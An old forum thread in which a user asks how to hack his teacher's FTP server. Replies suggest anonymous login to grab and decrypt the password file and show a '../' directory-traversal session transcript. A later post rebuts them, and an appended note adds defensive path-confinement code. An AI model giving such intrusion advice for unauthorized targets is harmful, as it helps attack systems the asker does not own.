-
September 18th, 2001, 04:34 PM
#1
Member
ftp server
Is it possible to hack into an FTP server??
I want to hack a site from my teacher, but the only way I can think of is a program that tries out a lot of words (with a dictionary).
This will not work, but does anyone know a better way?
greetz T
GOD invented evolution 'cause he couldn't do it all by himself.
-
September 19th, 2001, 08:46 PM
#2
And why do you wanna hack the FTP server?
Check for user:Anonymous Pass:Anonymous
And if you can get on, download the password file
Then decrypt it
-
September 20th, 2001, 12:41 AM
#3
Junior Member
Most FTP Servers are multithreaded supporting the RFC 959 protocol completely. A security vulnerability in these products allows attackers to traverse outside the normal bounding FTP root directory and read arbitrary files on the system.
Example:
220-Welcome to Cerberus FTP Server
220 Created by Grant Averett
Benutzer (192.168.0.2:(none)): anonymous
230 User anonymous logged in
ftp> ls
200 Port command received
150 Opening data connection
delphiown
226 Transfer complete
FTP: 11 Bytes empfangen in 0,00Sekunden 11000,00KB/s
ftp> cd delphiown/../../
250 Change directory ok
ftp> ls
200 Port command received
150 Opening data connection
As you can see, you need at least one valid directory to break out of the ftp root-dir.
chris@zxtech.net
www.zxtech.net
ZXtech Unix Hosting
-
September 20th, 2001, 08:54 AM
#5
Member
First off.. limp.. What the hell are you talking about? Anonymous access, at least on a UNIX machine, will NOT divulge a passwd file. ftproot is set up to have its own directory structure so that anonymous users cannot traverse outside of the daemon's root unless a user is logged in with a valid username and password.
..next..
What do you mean since it's multithreaded that you can leave document root? Hello. That's lame. Just because it's multithreaded doesn't mean that it can leave root. Multithreaded means that it can handle more than one connection (or process) at the same time. This has nothing to do with a poorly written FTP server not doing bounds checking on an anonymous connection to see if it is leaving root.
And, if a valid username and password is given, it is SUPPOSED to leave ftp root, as a matter of fact, it's supposed to dump you in your home directory. At least on most UNIX setups.
Jason Parker - http://www.o-negative.net
o-Negative: Information Network
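The bounds check that post #5 says a poorly written server skips, as an added example (not code from any poster in this thread or from Cerberus FTP Server): every client path is resolved against a virtual root before the file system is touched, so the "cd delphiown/../../" from post #3 ends at the FTP root instead of above it. The function names and the constructed directory layout are assumptions made for illustration.

```python
import os
import posixpath
import tempfile


def resolve_virtual(cwd, arg):
    """Resolve a client-supplied path against the session's virtual directory."""
    arg = arg.replace("\\", "/")  # treat both separators alike
    path = arg if arg.startswith("/") else posixpath.join(cwd, arg)
    parts = []
    for part in path.split("/"):
        if part in ("", "."):
            continue
        if part == "..":
            if parts:
                parts.pop()  # ".." at the virtual root stays at the root
            continue
        parts.append(part)
    return "/" + "/".join(parts)


def to_real(root, cwd, arg):
    """Map a client path to a real path, or None if it would leave the root."""
    root_real = os.path.realpath(root)
    virtual = resolve_virtual(cwd, arg)
    # realpath follows symlinks, so a link pointing outside the root is caught
    real = os.path.realpath(os.path.join(root_real, virtual.lstrip("/")))
    try:
        inside = os.path.commonpath([root_real, real]) == root_real
    except ValueError:  # e.g. different drives on Windows
        inside = False
    return real if inside else None


def demo():
    """Constructed layout: ftproot/delphiown plus a symlink leading outside."""
    with tempfile.TemporaryDirectory() as base:
        root = os.path.join(base, "ftproot")
        os.makedirs(os.path.join(root, "delphiown"))
        os.makedirs(os.path.join(base, "private"))
        os.symlink(os.path.join(base, "private"), os.path.join(root, "out"))
        root_real = os.path.realpath(root)
        return {
            "dotdot_stays_at_root": to_real(root, "/", "delphiown/../../") == root_real,
            "subdir_allowed": to_real(root, "/", "delphiown") is not None,
            "symlink_escape": to_real(root, "/", "out"),
        }


if __name__ == "__main__":
    print(demo())
```

A server that also drops privileges or chroots into the FTP root gets the same confinement from the operating system, which holds even if the path check has a bug.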